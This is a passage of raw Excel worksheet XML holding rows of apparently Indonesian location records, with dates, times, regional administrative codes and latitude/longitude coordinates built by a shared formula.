      <c r="Q2948" t="s">
        <v>1696</v>
      </c>
      <c r="R2948" t="s">
        <v>695</v>
      </c>
      <c r="S2948" t="s">
        <v>32</v>
      </c>
      <c r="T2948" t="s">
        <v>33</v>
      </c>
      <c r="U2948" s="5">
        <v>10671561</v>
      </c>
      <c r="V2948" s="5" t="s">
        <v>17099</v>
      </c>
      <c r="W2948" s="5">
        <v>-610192</v>
      </c>
      <c r="X2948" t="s">
        <v>20841</v>
      </c>
      <c r="Y2948" t="str">
        <f t="shared" si="46"/>
        <v>-6.10192,106.71561</v>
      </c>
    </row>
    <row r="2949" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2949">
        <v>240646</v>
      </c>
      <c r="B2949" s="1">
        <v>44235</v>
      </c>
      <c r="C2949" s="2">
        <v>0.57996527777777784</v>
      </c>
      <c r="D2949" t="s">
        <v>22</v>
      </c>
      <c r="E2949" t="s">
        <v>23</v>
      </c>
      <c r="F2949" t="s">
        <v>9966</v>
      </c>
      <c r="G2949" t="s">
        <v>9967</v>
      </c>
      <c r="H2949" t="s">
        <v>26</v>
      </c>
      <c r="I2949" t="s">
        <v>137</v>
      </c>
      <c r="J2949" t="s">
        <v>2627</v>
      </c>
      <c r="M2949">
        <v>3215113005</v>
      </c>
      <c r="N2949">
        <v>3215113</v>
      </c>
      <c r="O2949">
        <v>3215</v>
      </c>
      <c r="P2949">
        <v>32</v>
      </c>
      <c r="Q2949" t="s">
        <v>9968</v>
      </c>
      <c r="R2949" t="s">
        <v>9969</v>
      </c>
      <c r="S2949" t="s">
        <v>3979</v>
      </c>
      <c r="T2949" t="s">
        <v>42</v>
      </c>
      <c r="U2949" s="5">
        <v>10727304</v>
      </c>
      <c r="V2949" s="5" t="s">
        <v>17100</v>
      </c>
      <c r="W2949" s="5">
        <v>-627130</v>
      </c>
      <c r="X2949" t="s">
        <v>20842</v>
      </c>
      <c r="Y2949" t="str">
        <f t="shared" si="46"/>
        <v>-6.27130,107.27304</v>
      </c>
    </row>
    <row r="2950" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2950">
        <v>240685</v>
      </c>
      <c r="B2950" s="1">
        <v>44235</v>
      </c>
      <c r="C2950" s="2">
        <v>0.58464120370370376</v>
      </c>
      <c r="D2950" t="s">
        <v>22</v>
      </c>
      <c r="E2950" t="s">
        <v>23</v>
      </c>
      <c r="F2950" t="s">
        <v>9970</v>
      </c>
      <c r="G2950" t="s">
        <v>9971</v>
      </c>
      <c r="H2950" t="s">
        <v>26</v>
      </c>
      <c r="I2950" t="s">
        <v>9045</v>
      </c>
      <c r="J2950" t="s">
        <v>2627</v>
      </c>
      <c r="L2950" t="s">
        <v>9972</v>
      </c>
      <c r="M2950">
        <v>3212061008</v>
      </c>
      <c r="N2950">
        <v>3212061</v>
      </c>
      <c r="O2950">
        <v>3212</v>
      </c>
      <c r="P2950">
        <v>32</v>
      </c>
      <c r="Q2950" t="s">
        <v>7991</v>
      </c>
      <c r="R2950" t="s">
        <v>9973</v>
      </c>
      <c r="S2950" t="s">
        <v>8471</v>
      </c>
      <c r="T2950" t="s">
        <v>42</v>
      </c>
      <c r="U2950" s="5">
        <v>10832491</v>
      </c>
      <c r="V2950" s="5" t="s">
        <v>17101</v>
      </c>
      <c r="W2950" s="5">
        <v>-655958</v>
      </c>
      <c r="X2950" t="s">
        <v>20843</v>
      </c>
      <c r="Y2950" t="str">
        <f t="shared" si="46"/>
        <v>-6.55958,108.32491</v>
      </c>
    </row>
    <row r="2951" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2951">
        <v>240935</v>
      </c>
      <c r="B2951" s="1">
        <v>44235</v>
      </c>
      <c r="C2951" s="2">
        <v>0.63940972222222225</v>
      </c>
      <c r="D2951" t="s">
        <v>22</v>
      </c>
      <c r="E2951" t="s">
        <v>23</v>
      </c>
      <c r="F2951" t="s">
        <v>9974</v>
      </c>
      <c r="G2951" t="s">
        <v>9975</v>
      </c>
      <c r="H2951" t="s">
        <v>26</v>
      </c>
      <c r="I2951" t="s">
        <v>284</v>
      </c>
      <c r="J2951" t="s">
        <v>2627</v>
      </c>
      <c r="L2951" t="s">
        <v>9976</v>
      </c>
      <c r="M2951">
        <v>3213190007</v>
      </c>
      <c r="N2951">
        <v>3213190</v>
      </c>
      <c r="O2951">
        <v>3213</v>
      </c>
      <c r="P2951">
        <v>32</v>
      </c>
      <c r="Q2951" t="s">
        <v>5178</v>
      </c>
      <c r="R2951" t="s">
        <v>5178</v>
      </c>
      <c r="S2951" t="s">
        <v>5179</v>
      </c>
      <c r="T2951" t="s">
        <v>42</v>
      </c>
      <c r="U2951" s="5">
        <v>10782101</v>
      </c>
      <c r="V2951" s="5" t="s">
        <v>17102</v>
      </c>
      <c r="W2951" s="5">
        <v>-628416</v>
      </c>
      <c r="X2951" t="s">
        <v>20844</v>
      </c>
      <c r="Y2951" t="str">
        <f t="shared" si="46"/>
        <v>-6.28416,107.82101</v>
      </c>
    </row>
    <row r="2952" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2952">
        <v>242079</v>
      </c>
      <c r="B2952" s="1">
        <v>44235</v>
      </c>
      <c r="C2952" s="2">
        <v>0.96875</v>
      </c>
      <c r="D2952" t="s">
        <v>2648</v>
      </c>
      <c r="E2952" t="s">
        <v>23</v>
      </c>
      <c r="G2952" t="s">
        <v>9977</v>
      </c>
      <c r="H2952" t="s">
        <v>26</v>
      </c>
      <c r="J2952" t="s">
        <v>9827</v>
      </c>
      <c r="L2952" t="s">
        <v>9978</v>
      </c>
      <c r="M2952">
        <v>3173070003</v>
      </c>
      <c r="N2952">
        <v>3173070</v>
      </c>
      <c r="O2952">
        <v>3173</v>
      </c>
      <c r="P2952">
        <v>31</v>
      </c>
      <c r="Q2952" t="s">
        <v>520</v>
      </c>
      <c r="R2952" t="s">
        <v>323</v>
      </c>
      <c r="S2952" t="s">
        <v>62</v>
      </c>
      <c r="T2952" t="s">
        <v>33</v>
      </c>
      <c r="U2952" s="5">
        <v>10683289</v>
      </c>
      <c r="V2952" s="5" t="s">
        <v>17103</v>
      </c>
      <c r="W2952" s="5">
        <v>-615789</v>
      </c>
      <c r="X2952" t="s">
        <v>20845</v>
      </c>
      <c r="Y2952" t="str">
        <f t="shared" si="46"/>
        <v>-6.15789,106.83289</v>
      </c>
    </row>
    <row r="2953" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2953">
        <v>242095</v>
      </c>
      <c r="B2953" s="1">
        <v>44235</v>
      </c>
      <c r="C2953" s="2">
        <v>0.97083333333333333</v>
      </c>
      <c r="D2953" t="s">
        <v>2648</v>
      </c>
      <c r="E2953" t="s">
        <v>23</v>
      </c>
      <c r="G2953" t="s">
        <v>9979</v>
      </c>
      <c r="H2953" t="s">
        <v>26</v>
      </c>
      <c r="J2953" t="s">
        <v>524</v>
      </c>
      <c r="L2953" t="s">
        <v>9980</v>
      </c>
      <c r="M2953">
        <v>3173070001</v>
      </c>
      <c r="N2953">
        <v>3173070</v>
      </c>
      <c r="O2953">
        <v>3173</v>
      </c>
      <c r="P2953">
        <v>31</v>
      </c>
      <c r="Q2953" t="s">
        <v>322</v>
      </c>
      <c r="R2953" t="s">
        <v>323</v>
      </c>
      <c r="S2953" t="s">
        <v>62</v>
      </c>
      <c r="T2953" t="s">
        <v>33</v>
      </c>
      <c r="U2953" s="5">
        <v>10683280</v>
      </c>
      <c r="V2953" s="5" t="s">
        <v>17104</v>
      </c>
      <c r="W2953" s="5">
        <v>-616080</v>
      </c>
      <c r="X2953" t="s">
        <v>20846</v>
      </c>
      <c r="Y2953" t="str">
        <f t="shared" si="46"/>
        <v>-6.16080,106.83280</v>
      </c>
    </row>
    <row r="2954" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2954">
        <v>242209</v>
      </c>
      <c r="B2954" s="1">
        <v>44236</v>
      </c>
      <c r="C2954" s="2">
        <v>2.7777777777777779E-3</v>
      </c>
      <c r="D2954" t="s">
        <v>2648</v>
      </c>
      <c r="E2954" t="s">
        <v>23</v>
      </c>
      <c r="G2954" t="s">
        <v>9981</v>
      </c>
      <c r="H2954" t="s">
        <v>26</v>
      </c>
      <c r="J2954" t="s">
        <v>2036</v>
      </c>
      <c r="L2954" t="s">
        <v>9982</v>
      </c>
      <c r="M2954">
        <v>3173070001</v>
      </c>
      <c r="N2954">
        <v>3173070</v>
      </c>
      <c r="O2954">
        <v>3173</v>
      </c>
      <c r="P2954">
        <v>31</v>
      </c>
      <c r="Q2954" t="s">
        <v>322</v>
      </c>
      <c r="R2954" t="s">
        <v>323</v>
      </c>
      <c r="S2954" t="s">
        <v>62</v>
      </c>
      <c r="T2954" t="s">
        <v>33</v>
      </c>
      <c r="U2954" s="5">
        <v>10683421</v>
      </c>
      <c r="V2954" s="5" t="s">
        <v>17064</v>
      </c>
      <c r="W2954" s="5">
        <v>-615816</v>
      </c>
      <c r="X2954" t="s">
        <v>20804</v>
      </c>
      <c r="Y2954" t="str">
        <f t="shared" si="46"/>
        <v>-6.15816,106.83421</v>
      </c>
    </row>
    <row r="2955" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2955">
        <v>242292</v>
      </c>
      <c r="B2955" s="1">
        <v>44236</v>
      </c>
      <c r="C2955" s="2">
        <v>2.2222222222222223E-2</v>
      </c>
      <c r="D2955" t="s">
        <v>2648</v>
      </c>
      <c r="E2955" t="s">
        <v>23</v>
      </c>
      <c r="G2955" t="s">
        <v>9983</v>
      </c>
      <c r="H2955" t="s">
        <v>26</v>
      </c>
      <c r="J2955" t="s">
        <v>404</v>
      </c>
      <c r="L2955" t="s">
        <v>9984</v>
      </c>
      <c r="M2955">
        <v>3174020005</v>
      </c>
      <c r="N2955">
        <v>3174020</v>
      </c>
      <c r="O2955">
        <v>3174</v>
      </c>
      <c r="P2955">
        <v>31</v>
      </c>
      <c r="Q2955" t="s">
        <v>30</v>
      </c>
      <c r="R2955" t="s">
        <v>31</v>
      </c>
      <c r="S2955" t="s">
        <v>32</v>
      </c>
      <c r="T2955" t="s">
        <v>33</v>
      </c>
      <c r="U2955" s="5">
        <v>10677092</v>
      </c>
      <c r="V2955" s="5" t="s">
        <v>17105</v>
      </c>
      <c r="W2955" s="5">
        <v>-616646</v>
      </c>
      <c r="X2955" t="s">
        <v>20847</v>
      </c>
      <c r="Y2955" t="str">
        <f t="shared" si="46"/>
        <v>-6.16646,106.77092</v>
      </c>
    </row>
    <row r="2956" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2956">
        <v>242505</v>
      </c>
      <c r="B2956" s="1">
        <v>44236</v>
      </c>
      <c r="C2956" s="2">
        <v>6.6331018518518511E-2</v>
      </c>
      <c r="D2956" t="s">
        <v>85</v>
      </c>
      <c r="E2956" t="s">
        <v>23</v>
      </c>
      <c r="F2956" t="s">
        <v>9985</v>
      </c>
      <c r="G2956" t="s">
        <v>9986</v>
      </c>
      <c r="H2956" t="s">
        <v>26</v>
      </c>
      <c r="J2956" t="s">
        <v>2627</v>
      </c>
      <c r="K2956" t="s">
        <v>9987</v>
      </c>
      <c r="L2956" t="s">
        <v>9988</v>
      </c>
      <c r="M2956">
        <v>3216100004</v>
      </c>
      <c r="N2956">
        <v>3216100</v>
      </c>
      <c r="O2956">
        <v>3216</v>
      </c>
      <c r="P2956">
        <v>32</v>
      </c>
      <c r="Q2956" t="s">
        <v>9744</v>
      </c>
      <c r="R2956" t="s">
        <v>940</v>
      </c>
      <c r="S2956" t="s">
        <v>41</v>
      </c>
      <c r="T2956" t="s">
        <v>42</v>
      </c>
      <c r="U2956" s="5">
        <v>10699465</v>
      </c>
      <c r="V2956" s="5" t="s">
        <v>17106</v>
      </c>
      <c r="W2956" s="5">
        <v>-613273</v>
      </c>
      <c r="X2956" t="s">
        <v>20848</v>
      </c>
      <c r="Y2956" t="str">
        <f t="shared" si="46"/>
        <v>-6.13273,106.99465</v>
      </c>
    </row>
    <row r="2957" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2957">
        <v>242606</v>
      </c>
      <c r="B2957" s="1">
        <v>44236</v>
      </c>
      <c r="C2957" s="2">
        <v>0.10355324074074074</v>
      </c>
      <c r="D2957" t="s">
        <v>22</v>
      </c>
      <c r="E2957" t="s">
        <v>23</v>
      </c>
      <c r="F2957" t="s">
        <v>9989</v>
      </c>
      <c r="G2957" t="s">
        <v>9990</v>
      </c>
      <c r="H2957" t="s">
        <v>26</v>
      </c>
      <c r="I2957" t="s">
        <v>284</v>
      </c>
      <c r="J2957" t="s">
        <v>2627</v>
      </c>
      <c r="L2957" t="s">
        <v>9991</v>
      </c>
      <c r="M2957">
        <v>3213171003</v>
      </c>
      <c r="N2957">
        <v>3213171</v>
      </c>
      <c r="O2957">
        <v>3213</v>
      </c>
      <c r="P2957">
        <v>32</v>
      </c>
      <c r="Q2957" t="s">
        <v>9992</v>
      </c>
      <c r="R2957" t="s">
        <v>9993</v>
      </c>
      <c r="S2957" t="s">
        <v>5179</v>
      </c>
      <c r="T2957" t="s">
        <v>42</v>
      </c>
      <c r="U2957" s="5">
        <v>10780429</v>
      </c>
      <c r="V2957" s="5" t="s">
        <v>17107</v>
      </c>
      <c r="W2957" s="5">
        <v>-631939</v>
      </c>
      <c r="X2957" t="s">
        <v>20849</v>
      </c>
      <c r="Y2957" t="str">
        <f t="shared" si="46"/>
        <v>-6.31939,107.80429</v>
      </c>
    </row>
    <row r="2958" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2958">
        <v>242942</v>
      </c>
      <c r="B2958" s="1">
        <v>44236</v>
      </c>
      <c r="C2958" s="2">
        <v>0.19930555555555554</v>
      </c>
      <c r="D2958" t="s">
        <v>2648</v>
      </c>
      <c r="E2958" t="s">
        <v>23</v>
      </c>
      <c r="G2958" t="s">
        <v>9994</v>
      </c>
      <c r="H2958" t="s">
        <v>26</v>
      </c>
      <c r="J2958" t="s">
        <v>404</v>
      </c>
      <c r="L2958" t="s">
        <v>9995</v>
      </c>
      <c r="M2958">
        <v>3174020005</v>
      </c>
      <c r="N2958">
        <v>3174020</v>
      </c>
      <c r="O2958">
        <v>3174</v>
      </c>
      <c r="P2958">
        <v>31</v>
      </c>
      <c r="Q2958" t="s">
        <v>30</v>
      </c>
      <c r="R2958" t="s">
        <v>31</v>
      </c>
      <c r="S2958" t="s">
        <v>32</v>
      </c>
      <c r="T2958" t="s">
        <v>33</v>
      </c>
      <c r="U2958" s="5">
        <v>10677026</v>
      </c>
      <c r="V2958" s="5" t="s">
        <v>17108</v>
      </c>
      <c r="W2958" s="5">
        <v>-616605</v>
      </c>
      <c r="X2958" t="s">
        <v>20350</v>
      </c>
      <c r="Y2958" t="str">
        <f t="shared" si="46"/>
        <v>-6.16605,106.77026</v>
      </c>
    </row>
    <row r="2959" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2959">
        <v>242956</v>
      </c>
      <c r="B2959" s="1">
        <v>44236</v>
      </c>
      <c r="C2959" s="2">
        <v>0.20486111111111113</v>
      </c>
      <c r="D2959" t="s">
        <v>2648</v>
      </c>
      <c r="E2959" t="s">
        <v>23</v>
      </c>
      <c r="G2959" t="s">
        <v>9996</v>
      </c>
      <c r="H2959" t="s">
        <v>26</v>
      </c>
      <c r="J2959" t="s">
        <v>404</v>
      </c>
      <c r="L2959" t="s">
        <v>9997</v>
      </c>
      <c r="M2959">
        <v>3174020005</v>
      </c>
      <c r="N2959">
        <v>3174020</v>
      </c>
      <c r="O2959">
        <v>3174</v>
      </c>
      <c r="P2959">
        <v>31</v>
      </c>
      <c r="Q2959" t="s">
        <v>30</v>
      </c>
      <c r="R2959" t="s">
        <v>31</v>
      </c>
      <c r="S2959" t="s">
        <v>32</v>
      </c>
      <c r="T2959" t="s">
        <v>33</v>
      </c>
      <c r="U2959" s="5">
        <v>10677083</v>
      </c>
      <c r="V2959" s="5" t="s">
        <v>17109</v>
      </c>
      <c r="W2959" s="5">
        <v>-616650</v>
      </c>
      <c r="X2959" t="s">
        <v>20850</v>
      </c>
      <c r="Y2959" t="str">
        <f t="shared" si="46"/>
        <v>-6.16650,106.77083</v>
      </c>
    </row>
    <row r="2960" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2960">
        <v>243044</v>
      </c>
      <c r="B2960" s="1">
        <v>44236</v>
      </c>
      <c r="C2960" s="2">
        <v>0.22958333333333333</v>
      </c>
      <c r="D2960" t="s">
        <v>22</v>
      </c>
      <c r="E2960" t="s">
        <v>23</v>
      </c>
      <c r="F2960" t="s">
        <v>9998</v>
      </c>
      <c r="G2960" t="s">
        <v>9999</v>
      </c>
      <c r="H2960" t="s">
        <v>26</v>
      </c>
      <c r="I2960" t="s">
        <v>831</v>
      </c>
      <c r="J2960" t="s">
        <v>5777</v>
      </c>
      <c r="L2960" t="s">
        <v>10000</v>
      </c>
      <c r="M2960">
        <v>3171020007</v>
      </c>
      <c r="N2960">
        <v>3171020</v>
      </c>
      <c r="O2960">
        <v>3171</v>
      </c>
      <c r="P2960">
        <v>31</v>
      </c>
      <c r="Q2960" t="s">
        <v>5778</v>
      </c>
      <c r="R2960" t="s">
        <v>484</v>
      </c>
      <c r="S2960" t="s">
        <v>108</v>
      </c>
      <c r="T2960" t="s">
        <v>33</v>
      </c>
      <c r="U2960" s="5">
        <v>10685102</v>
      </c>
      <c r="V2960" s="5" t="s">
        <v>17110</v>
      </c>
      <c r="W2960" s="5">
        <v>-627570</v>
      </c>
      <c r="X2960" t="s">
        <v>20851</v>
      </c>
      <c r="Y2960" t="str">
        <f t="shared" si="46"/>
        <v>-6.27570,106.85102</v>
      </c>
    </row>
    <row r="2961" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2961">
        <v>243097</v>
      </c>
      <c r="B2961" s="1">
        <v>44236</v>
      </c>
      <c r="C2961" s="2">
        <v>0.23958333333333334</v>
      </c>
      <c r="D2961" t="s">
        <v>2648</v>
      </c>
      <c r="E2961" t="s">
        <v>23</v>
      </c>
      <c r="G2961" t="s">
        <v>10001</v>
      </c>
      <c r="H2961" t="s">
        <v>26</v>
      </c>
      <c r="I2961" t="s">
        <v>103</v>
      </c>
      <c r="J2961" t="s">
        <v>10002</v>
      </c>
      <c r="L2961" t="s">
        <v>10003</v>
      </c>
      <c r="M2961">
        <v>3172060008</v>
      </c>
      <c r="N2961">
        <v>3172060</v>
      </c>
      <c r="O2961">
        <v>3172</v>
      </c>
      <c r="P2961">
        <v>31</v>
      </c>
      <c r="Q2961" t="s">
        <v>1096</v>
      </c>
      <c r="R2961" t="s">
        <v>48</v>
      </c>
      <c r="S2961" t="s">
        <v>49</v>
      </c>
      <c r="T2961" t="s">
        <v>33</v>
      </c>
      <c r="U2961" s="5">
        <v>10685704</v>
      </c>
      <c r="V2961" s="5" t="s">
        <v>17111</v>
      </c>
      <c r="W2961" s="5">
        <v>-621547</v>
      </c>
      <c r="X2961" t="s">
        <v>20852</v>
      </c>
      <c r="Y2961" t="str">
        <f t="shared" si="46"/>
        <v>-6.21547,106.85704</v>
      </c>
    </row>
    <row r="2962" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2962">
        <v>243248</v>
      </c>
      <c r="B2962" s="1">
        <v>44236</v>
      </c>
      <c r="C2962" s="2">
        <v>0.27916666666666667</v>
      </c>
      <c r="D2962" t="s">
        <v>2648</v>
      </c>
      <c r="E2962" t="s">
        <v>23</v>
      </c>
      <c r="G2962" t="s">
        <v>10004</v>
      </c>
      <c r="H2962" t="s">
        <v>26</v>
      </c>
      <c r="J2962" t="s">
        <v>404</v>
      </c>
      <c r="L2962" t="s">
        <v>10005</v>
      </c>
      <c r="M2962">
        <v>3174020005</v>
      </c>
      <c r="N2962">
        <v>3174020</v>
      </c>
      <c r="O2962">
        <v>3174</v>
      </c>
      <c r="P2962">
        <v>31</v>
      </c>
      <c r="Q2962" t="s">
        <v>30</v>
      </c>
      <c r="R2962" t="s">
        <v>31</v>
      </c>
      <c r="S2962" t="s">
        <v>32</v>
      </c>
      <c r="T2962" t="s">
        <v>33</v>
      </c>
      <c r="U2962" s="5">
        <v>10677078</v>
      </c>
      <c r="V2962" s="5" t="s">
        <v>17112</v>
      </c>
      <c r="W2962" s="5">
        <v>-616643</v>
      </c>
      <c r="X2962" t="s">
        <v>20853</v>
      </c>
      <c r="Y2962" t="str">
        <f t="shared" si="46"/>
        <v>-6.16643,106.77078</v>
      </c>
    </row>
    <row r="2963" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2963">
        <v>243268</v>
      </c>
      <c r="B2963" s="1">
        <v>44236</v>
      </c>
      <c r="C2963" s="2">
        <v>0.2850462962962963</v>
      </c>
      <c r="D2963" t="s">
        <v>22</v>
      </c>
      <c r="E2963" t="s">
        <v>23</v>
      </c>
      <c r="F2963" t="s">
        <v>10006</v>
      </c>
      <c r="G2963" t="s">
        <v>10007</v>
      </c>
      <c r="H2963" t="s">
        <v>26</v>
      </c>
      <c r="I2963" t="s">
        <v>166</v>
      </c>
      <c r="J2963" t="s">
        <v>2627</v>
      </c>
      <c r="L2963" t="s">
        <v>10008</v>
      </c>
      <c r="M2963">
        <v>3212150015</v>
      </c>
      <c r="N2963">
        <v>3212150</v>
      </c>
      <c r="O2963">
        <v>3212</v>
      </c>
      <c r="P2963">
        <v>32</v>
      </c>
      <c r="Q2963" t="s">
        <v>10009</v>
      </c>
      <c r="R2963" t="s">
        <v>8471</v>
      </c>
      <c r="S2963" t="s">
        <v>8471</v>
      </c>
      <c r="T2963" t="s">
        <v>42</v>
      </c>
      <c r="U2963" s="5">
        <v>10832737</v>
      </c>
      <c r="V2963" s="5" t="s">
        <v>17113</v>
      </c>
      <c r="W2963" s="5">
        <v>-631979</v>
      </c>
      <c r="X2963" t="s">
        <v>20854</v>
      </c>
      <c r="Y2963" t="str">
        <f t="shared" si="46"/>
        <v>-6.31979,108.32737</v>
      </c>
    </row>
    <row r="2964" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2964">
        <v>243299</v>
      </c>
      <c r="B2964" s="1">
        <v>44236</v>
      </c>
      <c r="C2964" s="2">
        <v>0.28950231481481481</v>
      </c>
      <c r="D2964" t="s">
        <v>22</v>
      </c>
      <c r="E2964" t="s">
        <v>23</v>
      </c>
      <c r="F2964" t="s">
        <v>10010</v>
      </c>
      <c r="G2964" t="s">
        <v>10011</v>
      </c>
      <c r="H2964" t="s">
        <v>26</v>
      </c>
      <c r="I2964" t="s">
        <v>1161</v>
      </c>
      <c r="J2964" t="s">
        <v>2176</v>
      </c>
      <c r="L2964" t="s">
        <v>10012</v>
      </c>
      <c r="M2964">
        <v>3172050006</v>
      </c>
      <c r="N2964">
        <v>3172050</v>
      </c>
      <c r="O2964">
        <v>3172</v>
      </c>
      <c r="P2964">
        <v>31</v>
      </c>
      <c r="Q2964" t="s">
        <v>357</v>
      </c>
      <c r="R2964" t="s">
        <v>358</v>
      </c>
      <c r="S2964" t="s">
        <v>49</v>
      </c>
      <c r="T2964" t="s">
        <v>33</v>
      </c>
      <c r="U2964" s="5">
        <v>10686187</v>
      </c>
      <c r="V2964" s="5" t="s">
        <v>17114</v>
      </c>
      <c r="W2964" s="5">
        <v>-625945</v>
      </c>
      <c r="X2964" t="s">
        <v>20855</v>
      </c>
      <c r="Y2964" t="str">
        <f t="shared" si="46"/>
        <v>-6.25945,106.86187</v>
      </c>
    </row>
    <row r="2965" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2965">
        <v>243300</v>
      </c>
      <c r="B2965" s="1">
        <v>44236</v>
      </c>
      <c r="C2965" s="2">
        <v>0.28978009259259258</v>
      </c>
      <c r="D2965" t="s">
        <v>22</v>
      </c>
      <c r="E2965" t="s">
        <v>23</v>
      </c>
      <c r="F2965" t="s">
        <v>10013</v>
      </c>
      <c r="H2965" t="s">
        <v>26</v>
      </c>
      <c r="I2965" t="s">
        <v>2165</v>
      </c>
      <c r="J2965" t="s">
        <v>2622</v>
      </c>
      <c r="L2965" t="s">
        <v>10014</v>
      </c>
      <c r="M2965">
        <v>3517130004</v>
      </c>
      <c r="N2965">
        <v>3517130</v>
      </c>
      <c r="O2965">
        <v>3517</v>
      </c>
      <c r="P2965">
        <v>35</v>
      </c>
      <c r="Q2965" t="s">
        <v>10015</v>
      </c>
      <c r="R2965" t="s">
        <v>340</v>
      </c>
      <c r="S2965" t="s">
        <v>340</v>
      </c>
      <c r="T2965" t="s">
        <v>1221</v>
      </c>
      <c r="U2965" s="5">
        <v>11223302</v>
      </c>
      <c r="V2965" s="5" t="s">
        <v>17115</v>
      </c>
      <c r="W2965" s="5">
        <v>-755293</v>
      </c>
      <c r="X2965" t="s">
        <v>20856</v>
      </c>
      <c r="Y2965" t="str">
        <f t="shared" si="46"/>
        <v>-7.55293,112.23302</v>
      </c>
    </row>
    <row r="2966" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2966">
        <v>243301</v>
      </c>
      <c r="B2966" s="1">
        <v>44236</v>
      </c>
      <c r="C2966" s="2">
        <v>0.29210648148148149</v>
      </c>
      <c r="D2966" t="s">
        <v>22</v>
      </c>
      <c r="E2966" t="s">
        <v>23</v>
      </c>
      <c r="F2966" t="s">
        <v>10016</v>
      </c>
      <c r="H2966" t="s">
        <v>26</v>
      </c>
      <c r="I2966" t="s">
        <v>181</v>
      </c>
      <c r="J2966" t="s">
        <v>9927</v>
      </c>
      <c r="L2966" t="s">
        <v>10017</v>
      </c>
      <c r="M2966">
        <v>3374090013</v>
      </c>
      <c r="N2966">
        <v>3374090</v>
      </c>
      <c r="O2966">
        <v>3374</v>
      </c>
      <c r="P2966">
        <v>33</v>
      </c>
      <c r="Q2966" t="s">
        <v>1361</v>
      </c>
      <c r="R2966" t="s">
        <v>1362</v>
      </c>
      <c r="S2966" t="s">
        <v>1334</v>
      </c>
      <c r="T2966" t="s">
        <v>1134</v>
      </c>
      <c r="U2966" s="5">
        <v>11046178</v>
      </c>
      <c r="V2966" s="5" t="s">
        <v>17042</v>
      </c>
      <c r="W2966" s="5">
        <v>-695568</v>
      </c>
      <c r="X2966" t="s">
        <v>20857</v>
      </c>
      <c r="Y2966" t="str">
        <f t="shared" si="46"/>
        <v>-6.95568,110.46178</v>
      </c>
    </row>
    <row r="2967" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2967">
        <v>243318</v>
      </c>
      <c r="B2967" s="1">
        <v>44236</v>
      </c>
      <c r="C2967" s="2">
        <v>0.29396990740740742</v>
      </c>
      <c r="D2967" t="s">
        <v>22</v>
      </c>
      <c r="E2967" t="s">
        <v>23</v>
      </c>
      <c r="F2967" t="s">
        <v>10018</v>
      </c>
      <c r="H2967" t="s">
        <v>26</v>
      </c>
      <c r="I2967" t="s">
        <v>10019</v>
      </c>
      <c r="J2967" t="s">
        <v>2608</v>
      </c>
      <c r="L2967" t="s">
        <v>10020</v>
      </c>
      <c r="M2967">
        <v>3324170009</v>
      </c>
      <c r="N2967">
        <v>3324170</v>
      </c>
      <c r="O2967">
        <v>3324</v>
      </c>
      <c r="P2967">
        <v>33</v>
      </c>
      <c r="Q2967" t="s">
        <v>10021</v>
      </c>
      <c r="R2967" t="s">
        <v>10022</v>
      </c>
      <c r="S2967" t="s">
        <v>7074</v>
      </c>
      <c r="T2967" t="s">
        <v>1134</v>
      </c>
      <c r="U2967" s="5">
        <v>11020002</v>
      </c>
      <c r="V2967" s="5" t="s">
        <v>17116</v>
      </c>
      <c r="W2967" s="5">
        <v>-692699</v>
      </c>
      <c r="X2967" t="s">
        <v>20858</v>
      </c>
      <c r="Y2967" t="str">
        <f t="shared" si="46"/>
        <v>-6.92699,110.20002</v>
      </c>
    </row>
    <row r="2968" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2968">
        <v>243319</v>
      </c>
      <c r="B2968" s="1">
        <v>44236</v>
      </c>
      <c r="C2968" s="2">
        <v>0.29695601851851855</v>
      </c>
      <c r="D2968" t="s">
        <v>22</v>
      </c>
      <c r="E2968" t="s">
        <v>23</v>
      </c>
      <c r="F2968" t="s">
        <v>10023</v>
      </c>
      <c r="H2968" t="s">
        <v>26</v>
      </c>
      <c r="I2968" t="s">
        <v>10024</v>
      </c>
      <c r="J2968" t="s">
        <v>2608</v>
      </c>
      <c r="L2968" t="s">
        <v>10025</v>
      </c>
      <c r="M2968">
        <v>3375010012</v>
      </c>
      <c r="N2968">
        <v>3375010</v>
      </c>
      <c r="O2968">
        <v>3375</v>
      </c>
      <c r="P2968">
        <v>33</v>
      </c>
      <c r="Q2968" t="s">
        <v>6336</v>
      </c>
      <c r="R2968" t="s">
        <v>6337</v>
      </c>
      <c r="S2968" t="s">
        <v>6246</v>
      </c>
      <c r="T2968" t="s">
        <v>1134</v>
      </c>
      <c r="U2968" s="5">
        <v>10966486</v>
      </c>
      <c r="V2968" s="5" t="s">
        <v>17117</v>
      </c>
      <c r="W2968" s="5">
        <v>-688683</v>
      </c>
      <c r="X2968" t="s">
        <v>20859</v>
      </c>
      <c r="Y2968" t="str">
        <f t="shared" si="46"/>
        <v>-6.88683,109.66486</v>
      </c>
    </row>
    <row r="2969" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2969">
        <v>243320</v>
      </c>
      <c r="B2969" s="1">
        <v>44236</v>
      </c>
      <c r="C2969" s="2">
        <v>0.29703703703703704</v>
      </c>
      <c r="D2969" t="s">
        <v>22</v>
      </c>
      <c r="E2969" t="s">
        <v>23</v>
      </c>
      <c r="F2969" t="s">
        <v>10026</v>
      </c>
      <c r="G2969" t="s">
        <v>10027</v>
      </c>
      <c r="H2969" t="s">
        <v>26</v>
      </c>
      <c r="I2969" t="s">
        <v>4261</v>
      </c>
      <c r="J2969" t="s">
        <v>2627</v>
      </c>
      <c r="L2969" t="s">
        <v>10028</v>
      </c>
      <c r="M2969">
        <v>3216111001</v>
